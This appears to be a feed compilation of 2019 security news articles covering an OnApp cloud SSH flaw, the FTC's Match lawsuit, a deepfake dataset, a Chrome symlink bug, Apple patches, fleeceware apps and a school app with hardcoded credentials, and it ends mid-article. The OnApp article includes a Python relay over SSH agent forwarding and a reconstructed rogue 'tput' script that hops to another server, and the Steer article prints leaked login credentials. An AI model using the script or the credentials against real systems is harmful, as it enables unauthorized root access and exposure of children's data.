
Cloud Vulnerability Could Let One Server Compromise Thousands

A flaw in the OnApp cloud management platform could let an attacker compromise a private cloud with access to a single server.

A newly disclosed critical vulnerability in the OnApp cloud orchestration platform could let an attacker compromise an entire private cloud with access to a single server, researchers report.

The finding comes from researchers at security firm Skylight Cyber, who say the flaw has the potential to affect hundreds of thousands of production servers and organizations around the world. OnApp is a London-based cloud management company whose platform powers thousands of clouds for managed service providers, telcos, and other cloud hosting services.

Cloud security issues are common these days, but they usually stem from user misconfigurations and the accidental data leaks that follow; in other words, they are mostly the customer’s own fault. This particular flaw, located in a management system that thousands of providers use, could let an attacker access, steal, alter, or destroy data on a server through no fault of the user or provider.

OnApp’s strategy for managing different servers in the cloud environment could allow attackers to achieve remote code execution (RCE) with root privileges. All they need to do is rent a server, a simple process for which many companies require nothing more than an email address.

With that server, an attacker could compromise an entire private cloud due to the way OnApp manages different servers in the cloud environment, researchers explain in a technical blog post. Any user could trigger an SSH connection from OnApp to the managed server due to “agent forwarding,” which lets an attacker relay authentication to any server in the same cloud.

The vulnerability affects all OnApp control panels managing Xen or KVM compute resources, OnApp says in a security advisory. It does not affect OnApp control panels that only manage VMware vCloud Director or VMware vCenter environments, or CDN-only control panels. The company has issued a patch for the flaw and says there are no feasible workarounds.

Researchers tested, confirmed, and replicated their methodology across multiple cloud vendors, using OnApp for Xen and KVM hypervisors. In fact, it worked for them on the first try.

How They Found It
Skylight began investigating in May, when it was alerted to hate messages targeting the campaign of a candidate for Australia’s federal parliament. The emails were disguised to appear as though they came from many different Australian businesses; in reality, they all originated from a single source.

Analysis of the emails led to the discovery of several servers used to send them. It seems the attacker preferred to use a single hosting company, probably because it didn’t require payment or ID to start a free 24-hour trial. The researchers decided to retrace the attacker’s steps and see whether any incriminating evidence had been left behind. Finding none, they hypothesized that a bug might be involved.

The researchers explored the control panel of the hosting company and saw there was an SSH connection between their server and the cloud provider. A public key had been pre-installed to access the server, prompting the team to wonder whether the management software was using the same key pair to manage every server. It was: the researchers found they could launch an SSH connection to any server hosted with the company, even without holding the private key, and gain the same level of root access the provider had.

Agent forwarding made this possible. A feature of SSH, this lets you connect to a remote machine via SSH and give that machine the ability to use SSH to connect to other machines — without ever having the private authentication key or the passphrase that protects it, researchers explain.

The benefit is that someone can keep a private key locally, on one server, instead of storing it on multiple servers to authenticate connections. Using agent forwarding, this server can provide a remote server with the means to use the private key without having to expose it. The local machine answers “key challenges” and relays them through the remote server to target servers.
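
For the technically curious, here is a minimal sketch of that relay in Python, using the third-party paramiko SSH library; the hostnames and usernames are made up for illustration.

    import paramiko
    from paramiko.agent import AgentRequestHandler

    # Connect to the intermediate server; allow_agent=True lets the local
    # ssh-agent, which holds the private key, answer the key challenge.
    jump = paramiko.SSHClient()
    jump.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    jump.connect("intermediate.example.com", username="root", allow_agent=True)

    # Attach an agent-forwarding handler to a session on that server: any key
    # challenge raised further along the chain is relayed back to the local agent.
    session = jump.get_transport().open_session()
    AgentRequestHandler(session)

    # The intermediate machine can now SSH onward as "us", even though the
    # private key never left the local machine.
    session.exec_command("ssh root@target.example.com id")
    print(session.recv(4096).decode())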

Researchers call this “an extremely dangerous feature.” With agent forwarding enabled, a remote server accepting your SSH connection could authenticate to any server that accepts your credentials. They were able to trigger management software to use SSH to connect to their server and run commands, then swap the code it was intended to execute with arbitrary code by replacing one of the binaries it commonly executes. OnApp’s configuration of SSH with agent forwarding gave researchers a full chain to compromise all servers in a hosting company with root privileges.

Researchers tested this by setting up a source server, which an attacker could obtain with a simple free trial, and a target server. They overwrote the “tput” binary on the source server with their own script that used SSH forwarding to connect with the target server and drop a flag file. They triggered the management software and saw the flag file appear on the target server.
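
Their proof of concept amounted to a rogue script dropped in place of a binary the management software routinely runs. A hypothetical reconstruction in Python might look like this; the target address and flag path are invented for illustration.

    #!/usr/bin/env python3
    # Stand-in for the overwritten "tput" binary. When the management software
    # connects with agent forwarding enabled, this executes with the forwarded
    # agent socket (SSH_AUTH_SOCK) in its environment.
    import os
    import subprocess

    TARGET = "root@192.0.2.20"  # a victim server in the same cloud (illustrative)

    # The forwarded agent answers the key challenge, so no private key is needed
    # here; the hop onward succeeds with the provider's root credentials.
    subprocess.run(
        ["ssh", "-o", "StrictHostKeyChecking=no", TARGET, "touch /root/flag_file"],
        env=os.environ.copy(),
        check=False,
    )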

“If we could replicate this across other companies, then the impact is much greater and more dangerous,” according to Skylight Cyber. “All we have to do is find cloud providers using OnApp, rent a couple of servers, and test our thesis again.”

The vulnerability has been assigned the ID CVE-2019-12491.


Article source: https://www.darkreading.com/cloud/cloud-vulnerability-could-let-one-server-compromise-thousands/d/d-id/1335943?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Match knowingly puts people at risk from scammers, FTC charges

Did you know that between 2013 and at least mid-2018, between 25% and 30% of profiles on dating site Match.com were reportedly fake?

As in, those “people” weren’t looking for love – they were looking to shake down legitimate subscribers, signing up just so they could run romance scams, phish people’s personal information, push dubious or unlawful products or services, or run extortion scams…?

Well, Match.com – the biggest online dating site in the US – most certainly knew, the Federal Trade Commission (FTC) alleges in a lawsuit it filed on Wednesday.

According to the complaint, in some months between 2013 and 2016, more than half of the IMs and favorites that consumers received came from accounts that Match had identified as phony.

Match used those fake dates to lure non-subscribers into signing up, the complaint alleges. As it is, anybody can sign up for free, including con artists, but you have to pay to respond to messages from other users who hit you up with likes, favorites, IMs or emails.

How can you resist? Who doesn’t want to be able to respond to some yummy looking thing who bothered to reach out to you?

Millions of messages from predators

The (big) problem, the FTC alleges: Match knew the messages were coming from scammers. Match filtered out messages from bogus accounts that were sent to paying subscribers, the regulator says, but it let those tantalizing, and risk-filled, messages fly free when they were sent to non-subscribers.

So not only was it luring non-subscribers into ponying up for a subscription, it was also needlessly putting them at risk of being victimized, the FTC claims:

Millions of contacts that generated Match’s ‘You caught his eye’ notices came from accounts the company had already flagged as likely to be fraudulent. By contrast, Match prevented existing subscribers from receiving email communications from a suspected fraudulent account.

Hundreds of thousands paid to get in touch with scammers

As the FTC complaint tells it, hundreds of thousands of people signed up to Match.com shortly after receiving communications from these fake profiles. From the court document:

From June 2016 to May 2018, for example, [Match’s own] analysis found that consumers purchased 499,691 subscriptions within 24 hours of receiving an advertisement touting a fraudulent communication.

When people subscribed in order to read these messages, one of two things would happen, neither of them good, the complaint said: either they’d get into a conversation with a scammer’s bogus profile, or they’d receive a notification saying that the profile that messaged them was “unavailable.”

That outcome depended on whether somebody subscribed before or after Match completed its fraud review process. If it was before, then the new subscriber got to see the scammer’s communication. If it was after the fraud review, the profile was listed as “unavailable.”

However, the FTC alleges, in many cases Match didn’t bother to let people know that the Match.com users contacting them had had their profiles yanked because there was a high likelihood that those users were fraudsters.

“Dating” for dollars

It would be nice to assume that anybody who’s using online dating these days knows that they’re targets. Unfortunately, that’s far from accurate: many people fall prey to scammers on dating sites.

Last month, for example, the US Department of Justice (DOJ) unsealed a 252-count, 145-page federal indictment charging 80 defendants with conspiring to steal millions of dollars through online frauds (including romance scams) that targeted businesses, the elderly and women.

Romance scams were just one of the swindles that the criminal network used, but they were among the most profitable. In one case, a Japanese woman was bled of hundreds of thousands of dollars after meeting a fraudster claiming to be a captain in the US Army who wanted her to help smuggle diamonds out of Syria.

These types of romance scams are surging, the FBI has warned. In August 2019, the FBI’s online crime division – the Internet Crime Complaint Center (IC3) – issued a warning about the rising number of faux lover-boys and -girls who are turning to online dating sites to run romance or confidence frauds. Besides talking marks into sending money, a rising trend for these con artists is to try to talk them into becoming money mules or drug runners, the FBI said.

We’ve seen plenty of these scams in past years: FBI numbers show that in 2018, more than 18,000 people filed complaints with the IC3 alleging they were victims of romance/confidence fraud, reporting losses of more than $362 million and making it the second-costliest type of scam.

Selective fraud-flagging?

In spite of how very real the danger is, and how very effective the scams are, Match let these convincing, conniving crooks through, the FTC alleges. Selectively, that is.

The complaint says that between 2013 and mid-2018, Match delivered email communications from fraud-flagged users to non-subscribers while filtering them to keep them away from subscribers until the site finished its fraud review:

If, for example, a user [Match] flagged as potentially fraudulent had sent three emails to subscribers and three emails to nonsubscribers, [Match] would have withheld the three emails sent to subscribers until its fraud review was complete while allowing the three emails sent to nonsubscribers to reach their recipients.

Without this practice, the vast majority of these fraud-flagged Match.com users would never have been able to contact their intended recipients: between June 2016 and the beginning of May 2018, for example, approximately 87.8 percent of accounts whose messages [Match] withheld were later confirmed … to be fraudulent.
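
In pseudocode terms, the complaint describes a two-track delivery rule along these lines; this is a reconstruction from the complaint’s own example, not Match’s actual code.

    from dataclasses import dataclass

    @dataclass
    class User:
        name: str
        is_subscriber: bool = False
        flagged_as_fraud: bool = False

    def deliver(sender, recipient):
        """Route a message the way the FTC complaint alleges Match did."""
        if sender.flagged_as_fraud and recipient.is_subscriber:
            return "withheld pending fraud review"   # paying subscribers were shielded
        return "delivered"                           # non-subscribers were not

    scammer = User("flagged-user", flagged_as_fraud=True)
    print(deliver(scammer, User("paying", is_subscriber=True)))  # withheld...
    print(deliver(scammer, User("free")))                        # ...but delivered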

Not the first lawsuit

This isn’t the first we’ve heard of these allegations. In May 2018, a class action lawsuit was filed against Match parent company Match Group LLC, alleging that more than half of Match.com profiles are fake and are used to entice new members.

The FTC’s suit is seeking permanent injunctive relief, for the company’s contracts to be redone or rescinded, and for people to get their money back.

Match: The FTC’s making “outrageous claims”

The Verge reports that Match.com CEO Hesam Hosseini sent an internal email to executives on Wednesday morning that rejected the FTC’s allegations. From that email:

The FTC will likely make outrageous allegations that ignore all of Match’s efforts to prioritize the customer experience, including our efforts to combat fraud.

In the email, Hosseini said what the company went on to say in a statement in response to the lawsuit: that the company catches and neutralizes 85% of fraudulent accounts within the first four hours of their creation, “typically before they are even active on the site,” and that 96% of improper accounts are ferreted out within a day.

Match also maintains that the FTC has “misrepresented” internal emails and relied on “cherry-picked data” to make “outrageous claims.”

Hosseini also argued in the internal email that the accounts that the FTC defines as fraudulent aren’t related to scams but rather are the product of bots, spam, and people trying to sell a service on the dating site.

I believe the FTC has fundamentally misunderstood our work here, and we intend to fight any allegations.

Other complaints from the lawsuit

The FTC is also alleging that Match deceived people into subscribing by promising them a free six-month subscription if they didn’t “meet someone special.” It neglected to tell customers that they had to jump through a few hoops to get that free six months, though, the complaint says.

The FTC also claims that Match made canceling subscriptions very tough: it requires more than six clicks, according to the complaint. The company also allegedly locked people out of their accounts after they disputed charges, even if they lost their dispute and had time remaining in their subscription.

Watch “Romance scams” on Naked Security Live, available on YouTube.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qoySkY_s2X8/

Google made thousands of deepfakes to aid detection efforts

Google has released a data set of thousands of deepfake videos that it produced using paid, consenting actors in order to help researchers in the ongoing work of coming up with detection methods.

In order for researchers to train and test automated detection tools, they need to feed them a whole lot of deepfakes to scrutinize. Google is helping by making its dataset available to researchers, who can use it to train algorithms that spot deepfakes.

The data set, available on GitHub, contains more than 3,000 deepfake videos. Google said on its artificial intelligence (AI) blog that the hyperrealistic videos, created in collaboration with its Jigsaw technology incubator, have been incorporated into the Technical University of Munich and the University Federico II of Naples’ new FaceForensics benchmark – an effort that Google co-sponsors.

To produce the videos, Google used 28 actors, placing pairs of them in quotidian settings: hugging, talking, expressing emotion and the like.


A sample of videos from Google’s contribution to the FaceForensics benchmark. To generate these, pairs of actors were selected randomly and deep neural networks swapped the face of one actor onto the head of another.

To transform their faces, Google used publicly available, state-of-the-art, automatic deepfake algorithms: Deepfakes, Face2Face, FaceSwap and NeuralTextures. You can read more about those algorithms in this white paper from the FaceForensics team. In January 2019, the academic team, led by a researcher from the Technical University of Munich, created another data set of deepfakes, FaceForensics++, by performing those four common face manipulation methods on nearly 1,000 YouTube videos.

Google added to those efforts with another method that does face manipulation using a family of dueling computer programs known as generative adversarial networks (GANs): machine learning systems that pit neural networks against each other in order to generate convincing photos of people who don’t exist. Google also added the Neural Textures image manipulation algorithm to the mix.
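
To give a sense of the “dueling” mechanic, here is a toy adversarial training loop in Python with PyTorch, fitting a one-dimensional distribution rather than faces; it illustrates the principle only, not the models Google used.

    import torch
    import torch.nn as nn

    G = nn.Sequential(nn.Linear(8, 16), nn.ReLU(), nn.Linear(16, 1))  # generator
    D = nn.Sequential(nn.Linear(1, 16), nn.ReLU(), nn.Linear(16, 1))  # discriminator
    opt_g = torch.optim.Adam(G.parameters(), lr=1e-3)
    opt_d = torch.optim.Adam(D.parameters(), lr=1e-3)
    bce = nn.BCEWithLogitsLoss()

    for step in range(2000):
        real = torch.randn(64, 1) * 0.5 + 3.0   # "real" samples from N(3, 0.5)
        fake = G(torch.randn(64, 8))            # generator's forgeries

        # The discriminator learns to tell real from fake...
        loss_d = bce(D(real), torch.ones(64, 1)) + bce(D(fake.detach()), torch.zeros(64, 1))
        opt_d.zero_grad(); loss_d.backward(); opt_d.step()

        # ...while the generator learns to fool it: the adversarial "duel".
        loss_g = bce(D(fake), torch.ones(64, 1))
        opt_g.zero_grad(); loss_g.backward(); opt_g.step()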

Yet another data set of deepfakes is in the works, this one from Facebook. Earlier this month, it announced that it was launching a $10m deepfake detection project.

It will, as the name DeepFake Detection Challenge suggests, help people detect deepfakes. Like Google, Facebook’s going to make the data set available to researchers.

An arms race

This is, of course, an ongoing battle. As recently as last month, when we heard about mice being pretty good at detecting deepfake audio, that meant the critters were close to the median accuracy of 92% for state-of-the-art detection algorithms: algorithms that detect unusual head movements or inconsistent lighting, or, in shoddier deepfakes, spot subjects who don’t blink. (The US Defense Advanced Research Projects Agency [DARPA] found that a lack of blinking was a giveaway, at least as of the technology’s state of evolution circa August 2018.)

In spite of the current, fairly high detection rate, we need all the help we can get to withstand the ever more sophisticated fakes that are coming. Deepfake technology is evolving at breakneck speed, and just because detection is fairly reliable now doesn’t mean it’s going to stay that way. That’s why difficult-to-detect impersonation was a “significant” topic at this year’s Black Hat and Def Con conferences, as the BBC reported last month.

We’re already seeing GANs reportedly used to create what an AP investigation recently suggested was a deepfake LinkedIn profile of a comely young woman who was suspiciously well-connected to people in power.

Forensic experts easily spotted 30-year-old “Katie Jones” as a deepfake, and that was fairly recent: the story was published in June. Then came DeepNude, an app that also used GANs and appeared to have advanced the technology considerably further, while packaging it so that anybody could generate a deepfake within 30 seconds.

This isn’t Google’s first contribution to the field of unmasking fakes: in January, it released a database of synthetic speech to help out with fake audio detection. Google says that it also plans to add to its deepfake dataset as deepfake generation technology evolves:

We firmly believe in supporting a thriving research community around mitigating potential harms from misuses of synthetic media, and today’s release of our deepfake dataset in the FaceForensics benchmark is an important step in that direction.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/-p47wfO19Ec/

Chrome cripples movie studio Mac Pros

It’s not often that a single software bug can bring an entire industry to a virtual standstill, but it happened this week – and experts finally found an unlikely culprit.

The problem began on Monday 22 September when reports emerged of a problem with Macs running Avid software.

Avid is an editing suite that production companies use to put movies and TV programs together. A few days ago, movie editors started reporting that Mac Pros running Avid software were crashing. If users tried to restart their machines, they wouldn’t reboot. It left production studios tearing their hair out as they lost valuable editing time.

Shane Ross, staff editor at Prometheus Entertainment, and Michael Kamens, assistant editor on Modern Family, were among the editors tweeting their frustration as the situation broke.

Imagine how you’d be feeling if you were working on something with a deadline of hours, like a news segment.

Props to Avid, which was all over this problem from the beginning, dropping everything to work out what was going on, in a perfect example of how to handle a technical issue properly. The company even put up a video updating users on its progress.

What was going on? Was it a virus? Was it another crazy attack from hackers upset about a movie that they didn’t like?

Yesterday, we found out. Google did it.

The problem wasn’t with Avid, or with macOS, but with the Chrome browser. Google’s latest Chrome update had borked the system with a bug.

When Mac users install Chrome, they’re not just getting the browser. Google also installs another module under the hood called Keystone. It’s an update manager that regularly checks to see if there are new versions of Google programs and updates them behind the scenes. Doesn’t that make you feel safe? Well, it does, until it goes wrong. The latest version of Keystone was broken.

According to a Google post explaining the incident, Chrome damaged the file system on macOS machines. It said little more than that, other than providing some command line code to fix the issue. A Chrome bug report shed more light on the matter, though.

Chrome removed a symbolic link (symlink), which is a shortcut to a linked object. The system treats the symlink as the linked object. Keystone removed the /var symlink, which threw the affected Macs into disarray. Several online commentators have already labelled the bug a ‘varsectomy’. Geddit?
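
To see why yanking one symlink is so destructive, here is a small, safe demonstration in Python that stays inside a temporary directory; the paths merely mimic the real layout.

    import os
    import tempfile

    root = tempfile.mkdtemp()
    real = os.path.join(root, "private", "var")
    os.makedirs(real)

    link = os.path.join(root, "var")
    os.symlink(real, link)             # mimics macOS, where /var -> /private/var

    print(os.path.realpath(link))      # resolves to .../private/var
    os.remove(link)                    # what the buggy Keystone update did
    print(os.path.exists(link))        # False: everything "under /var" is now unreachable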

Macs are supposed to prevent programs from tinkering with the system by default, using a protective measure called System Integrity Protection (SIP). Also known as rootless, it’s a feature introduced in OS X El Capitan that protects system-owned files from alteration. It even protects them from sudo, the Unix command that people use when they’re doing dangerous stuff on the system and need to escalate their privileges.

SIP is switched on by default, but programs wanting deep access to graphics cards, like, say, a movie editing program, often need it turned off. That’s why Avid users were so vulnerable to the issue, but the bug also affects pre-El Capitan versions of OS X, which don’t have SIP at all.

This just goes to show how much trouble a simple software bug can cause. The problem wasn’t with Avid or macOS at all, but with a completely different third-party app.

Google was still working on a patch at the time of writing. In the meantime, follow the instructions to fix the problem.

This is one situation where the classic question “have you tried turning it off and on again” most definitely would not have been advisable.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/BZ_Snk9ZWg4/

Apple users, patch now! The ‘bug that got away’ has been fixed

Remember the Black Hat conference of 2019?

Chances are you didn’t attend – even though it’s a huge event, the vast majority of cybersecurity professionals only experience it remotely – but you probably heard about some of the more dramatic talk titles…

…including one from Google with the intriguing title Look, no hands! – The remote, interaction-less attack surface of the iPhone.

The talk was presented by well-known Google Project Zero researcher Natalie Silvanovich, and it covered a wide-ranging vulnerability research project conducted by Silvanovich and her colleague Samuel Groß.

They decided to dig into the software components in your iPhone that automatically process data uploaded from the outside, to see if they could find bugs that might be remotely exploitable.

Silvanovich and Groß investigated five message-handling components on the iPhone: SMS, MMS, Visual voicemail, email and iMessage.

The idea was to search not for security bugs by which you could be tricked into making a serious security blunder, but for holes by which your device itself could be tricked without you even being involved.

They found several such flaws, denoted by the following CVE numbers: CVE-2019-8624, -8641, -8647, -8660, -8661, -8662, and -8663.

Most of those holes were revealed to the public in August 2019, following Project Zero’s usual approach of ‘dropping’ detailed descriptions and proof-of-concept code to do with vulnerabilities for which patches already exist.

That’s why we urged you, back in August 2019, to double-check that you were patched up to iOS 12.4 – it’s risky to be unpatched at any time, let alone after exploit code is available to anyone who cares to download it.

Interestingly, Google deliberately kept quiet about CVE-2019-8641 at the time, noting that Apple’s fix “did not fully remediate the issue”.

It looks as though the Project Zero researchers were right, because Apple’s latest slew of updates includes a fix explicitly listed as:

   [Component:] Foundation

       Impact:  A remote attacker may be able to cause unexpected 
                application termination or arbitrary code execution

  Description:  An out-of-bounds read was addressed with improved 
                input validation

CVE-2019-8641:  Samuel Groß and Natalie Silvanovich 
                of Google Project Zero

What else?

If you have a Mac, the above patch is the only item listed in the latest update advisory.

The update isn’t big enough to get a new release number of its own, so it’s just macOS Mojave 10.14.6 Supplemental Update 2 (or Security Update 2019-005 if you are still on High Sierra 10.13.6 or Sierra 10.12.6).

If you have an iDevice that can’t run iOS 13 – for example, an iPhone 6 or earlier or an iPad mini 3 or earlier – then you get an update to iOS 12.4.2, and the above patch is the only one listed.

But Apple has listed many other fixes in iOS 13 along with the patch for CVE-2019-8641, including:

  • Fixing a data leakage bug related to watching movie files.
  • Closing another of José Rodríguez’s lock screen bypasses (CVE-2019-8742).
  • Beefing up Face ID to make it harder to bypass using 3D models (CVE-2019-8760).
  • Stopping a data leak via iOS 13’s new keyboard add-on system (CVE-2019-8704).

Stay put or move forward?

Slightly confusingly, the iOS 13 and iOS 13.1 advisories arrived at the same time, with the iOS 13.1 advisory listing only the patch for the lock screen bug found by José Rodríguez.

We’ve already been asked if this means that anyone who hasn’t yet updated to iOS 13, and who will now end up skipping straight from iOS 12.4.1 to iOS 13.1, will somehow skip the updates listed in the iOS 13 advisory.

As far as we can tell, the answer is, “No.”

A fresh install of iOS 13.1, or an update from any earlier version of iOS, is a cumulative update with everything you need rolled into it – if you skip over an update, you won’t skip the security fixes that were in it.

We don’t know why Apple didn’t publish its iOS 13 advisory when iOS 13 actually came out, instead of confusingly giving the impression that iOS 13 and 13.1 are alternative choices that are both available now.

One guess is that Apple didn’t want to draw too much attention to the fact that although iOS 13 received its CVE-2019-8641 fix more than a week ago, there was no corresponding fix for iOS 12.4.1, which many users were stuck with due to the age of their devices.

Anyway, all supported Apple operating systems now have the revised CVE-2019-8641 update, and it’s worth updating for that alone.

What to do?

On your Mac, go to Apple menu > About This Mac > Software Update…

On your iPhone, go to Settings > General > Software Update.

If you are already up to date, macOS and iOS will tell you; if not, they’ll offer to do the update right away.

Given that the headline bug in this round of patches could be abused to inject malicious code from a distance – what’s known as RCE, or Remote Code Execution – without waiting for you to click or approve anything, we recommend doing an update check right now.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/vMQXw1rIjGw/

‘Fleeceware’ Play store apps quietly charging up to $250

Imagine an Android GIF-making app available on Google Play that automatically charges €214.99 ($253) to continue using it beyond its three-day trial period.

Or how about a completely unremarkable QR code reader app, whose developer thinks that a charge of €104.99 is a fair price to continue using it 72 hours after it was downloaded.

If you think these prices sound far-fetched, we have news – researchers at SophosLabs have discovered at least 15 apps, downloaded millions of times between them, that charge these extraordinary prices under Google’s nose.

The most unexpected part of this discovery? By exploiting a loophole in the Play store licensing regime, this behaviour appears to be legal.

Getting away with it

The scam works by exploiting a legitimate app store mechanism: users can download apps under a trial license which, in this case, ends after a few days.

There is nothing obviously malicious about the apps, which mostly work as advertised, albeit that their features are identical to advertising-supported apps that cost nothing.

Importantly, the apps ask users to submit their payment details during the trial period, which most users probably assume won’t apply if they de-install the app.

Because the huge annual subscription price is only mentioned in small print, users probably assume the cost will be a few dollars or euros.

SophosLabs’ researchers discovered three apps charging €219.99 for full licenses, with another five charging €104.99, and one charging €114.99.

One of these ‘fleeceware’ apps had more than 10 million downloads, two had 5 million, with the rest between 5,000 and 50,000.

There doesn’t appear to be any easy way to recover the money using either chargebacks or refunds.

SophosLabs malware analyst Jagadeesh Chandraiah, with admirable understatement, said:

We haven’t seen apps sold at this price before.

When Naked Security covers stories of rogue apps in the Play store, Google often doesn’t seem to notice the problem at all until researchers report the apps for malicious or exploitative behaviour.

The failure to spot what’s going on does seem to be an issue here too – SophosLabs offers examples of Play store users complaining about fleeceware apps, apparently without anyone higher up noticing this.

For example, one user headlined their one-star app review “SCAM THAT TAKES YOUR 95 DOLLARS!!!” before suggesting: “take this app down Google.”

So far, the company also hasn’t clarified whether apps offered under trial with very high licensing prices might breach in-app policies.

Google didn’t notice the bad reviews or the high prices until SophosLabs alerted it to the issue, although last week 14 of the 15 apps named by SophosLabs were removed. Unfortunately, says Chandraiah…

A subsequent search revealed another batch of apps, with even higher download counts than the first, still available on the Play Market.

Which suggests this app behaviour might be what is called a ‘grey area’.

Because the apps themselves aren’t engaging in any kind of traditionally malicious activity, they skirt the rules that would otherwise make it easy for Google to justify removing them from the Play Market.

Perhaps this is simply an extreme case of caveat emptor (buyer beware). But on the app store of the world’s largest mobile operating system maker, users should surely never find themselves being charged hundreds of euros for an unremarkable GIF utility.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/H5gANUVkXYM/

Pupil mental health monitor promises app rewrite after hardcoded login creds discovered

Exclusive A British firm whose mobile apps monitor the mental state of 35,000 British schoolchildren is having to rewrite them after researchers found hardcoded login credentials within.

“Tracking steering biases is a pioneering technique developed by STEER using AI to identify patterns of bias linked to mental health risks in 10,000 test students,” burbles the company’s website.

Steer, a trading name of Mind.World Ltd, claims to have 150 subscribing schools. Included within the customer list on its website are British public schools such as Charterhouse, Fettes College, Oundle School and Wellington College.

Children enrolled in one of Steer’s apps are labelled as red, amber or green depending on how it grades their mental health in response to questionnaires they fill out.

Its flagship tech, deployed under the brands AS Tracking and CAS Tracking, is sold to schools as a way of monitoring their pupils’ wellbeing and allowing teachers to stage interventions.

“Since we began running AS Tracking we got a 20 per cent decrease in self harm at the college,” a teacher told Sky News on Monday, for a video feature extolling the firm’s virtues.

The company offers to let schools “track, signpost and support every pupil” through its apps, database functionality and analytics, boasting that by licensing each child for £18.75, schools can “benchmark” themselves “nationally”.

Yet versions of the apps developed for pupils and teachers alike contain hardcoded login credentials – posing a security risk to the most sensitive mental health data and information of the most vulnerable children.

Keys to the kids’ castle

Privacy advocate and internet troublemaker Gareth Llewellyn discovered the login credentials. Embedded within the Android version of AS Tracking were what appeared to be username and password pairs:

public static String AUTH_PASSWORD = "y2-@qtYg*xFMQ)g";
public static String AUTH_USERNAME = "usteer"; 

public static final String API_BASIC_AUTH_PASSWORD = "Shi$i7eth7ae";
public static final String API_BASIC_AUTH_USERNAME = "Testing";
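
By contrast, the usual fix is to resolve secrets at runtime rather than compiling them in. A minimal sketch in Python, with hypothetical variable names:

    import base64
    import os

    # Pull credentials from the environment (or a platform keystore) at runtime;
    # the variable names here are invented for illustration.
    AUTH_USERNAME = os.environ["STEER_AUTH_USERNAME"]
    AUTH_PASSWORD = os.environ["STEER_AUTH_PASSWORD"]

    def basic_auth_header():
        """Build an HTTP basic-auth header without baking the secret into source."""
        token = base64.b64encode(f"{AUTH_USERNAME}:{AUTH_PASSWORD}".encode()).decode()
        return {"Authorization": f"Basic {token}"}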

Once The Register persuaded Steer to take our concerns seriously, the company responded by promising to rewrite its apps to remove the hardcoded credentials and improve its general security. It said that the testing account was not used in practice and claimed that the “usteer” credential pair was a “legacy” login which has now been disabled.

The firm told us:

Data privacy and security are Steer’s absolute priority so as soon as we were made aware of this potential issue, we started an investigation together with our third-party developers.

It’s important to state that all data stored on our servers is encrypted, and not attributable to individuals: access IDs are encrypted, passwords are hashed, and this information is separated from the encrypted assessment data, which requires a separately stored algorithm (and other information) to interpret. Accordingly, while our investigation is ongoing, we do not believe that any sensitive data was accessible, or exposed.

Steer concluded: “We have removed the credential information flagged by The Register and are applying additional security measures as a precaution.”

The good, the bad and the ugly

Duncan Brown, chief security strategist at web filtering biz Forcepoint, took a nuanced view of what happened here. He told The Reg: “The app developers are aiming to mitigate against the negative impact mental health issues can cause, and we should not shy away from using technology to assist people in understanding behavioural patterns.

“However, the security needs to be as robust as the science, particularly when dealing with such sensitive information held on minors. We should not avoid initiatives such as these simply to avoid potential privacy issues but privacy and security must be hardwired in: it’s extraordinary that in 2019 developers are still hardcoding passwords.”

Getting in a sneaky mention of his firm’s current product lineup, which depends on analytics and analysis, Brown opined: “As usage of behavioural analytics grows, we as an industry need to improve governance, clearly lay out the purpose of any data collection – and of course ensure that any personal data collected remains completely secure.”

Hardcoded credentials have caught out many a developer and company before. A smart home company called Zipato hardcoded the same private SSH key into all of its hubs, forcing the company to update all the devices and scrap the SSH tunnel. Similarly, Juniper Networks hardcoded login credentials into some of its data centre switches, a blunder discovered earlier this year.

Never one to be outdone in security snafus, Cisco admitted last year that it had not only left an undocumented root account in its video surveillance management software product, but that account also had hardcoded credentials.

The prevalence of these cockups doesn’t clear these companies of wrongdoing. In the 21st century nothing should be deployed publicly with hardcoded creds. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/27/pupil_mental_health_tracking_app_security_fears/

Is Your Organization Suffering from Security Tool Sprawl?

Most companies have too many tools, causing increased costs and security issues.

The advent of the cloud and software-as-a-service (SaaS) applications has given the IT industry many advantages, including increased agility and availability. Unfortunately, the trend has also significantly contributed to the growing issue of tool sprawl — the use of too many one-off specialized solutions — for both virtualized and point solutions.

Tool sprawl hurts IT productivity, resulting in troublesome management workflows and high costs. The compelling ease of deployment and flexibility of the cloud has led many organizations to adopt and deploy a wide roster of security solutions without having a comprehensive security strategy in place. According to a Forrester survey of IT decision-makers, 55% of respondents report having 20 or more tools between security and operations, and 70% say these tools lack full integration. For security specifically, simply deploying more technologies isn’t the best way to stop breaches — in fact, it can be the opposite. 

A common side effect of security tool sprawl is exposure to vulnerabilities and backdoors to serious threats. Hackers often exploit vulnerabilities in tools that do not communicate securely or are not regularly updated. With a piecemeal approach, your network can be open to threats that are commonly used for reconnaissance in early stages, as well as lateral movement and pivoting in later stages of an attack.

Each year, IT spending increases while countless new tools enter the market. Mergers and acquisitions increase tool sprawl as well. When one company absorbs another, they must integrate two entirely different IT infrastructures and inevitably some of the pieces overlap. Disentangling all of them is often not practical, and the new business winds up with multiple tools that serve the same function and often don’t integrate with one another.

The growing adoption of cloud management and cloud infrastructure makes this worse, since things like endpoint solutions and workstation instances running in public cloud infrastructures are much more likely to be overlooked in the integration process. According to a recent 451 Research survey, 39% of respondents juggle 11 to 30 monitoring tools to keep an eye on their application, infrastructure, and cloud environments — with 8% using between 21 and 30 tools! Rather than offering better visibility, adopting too many tools can result in high costs, inefficiencies, cumbersome workflows, and potential weak spots if security solutions aren’t deployed and managed strategically.

Be On Guard
Every organization should be on guard against security tool sprawl. With the increase in IT security spending and the growing adoption of new defense technologies, network administrators often find themselves toggling between a large roster of security solutions with overlapping use cases and functionality (sometimes 10 or more in a single functional area, based on conversations I’ve had with network admin customers and the resellers who work with them). This creates many issues, ranging from licensing costs to reduced productivity and an increased chance of missing or mishandling critical patches and bug fixes.

IT decision-makers within organizations of all sizes should focus on putting measures into place that curb security tool sprawl and curtail the serious security issues that can arise as a result. Here are several key best practices that every organization can use to avoid security tool sprawl:

1. Clearly identify the scope and entities of coverage required before deploying a new security tool. It’s critical that you understand the various components of the IT infrastructure at hand (that is, network, endpoint, wireless, identities, etc.) and map security coverage across individual use cases (such as users, applications, physical, virtual, etc.). This will allow you to explore opportunities for consolidation when choosing the appropriate security solutions.

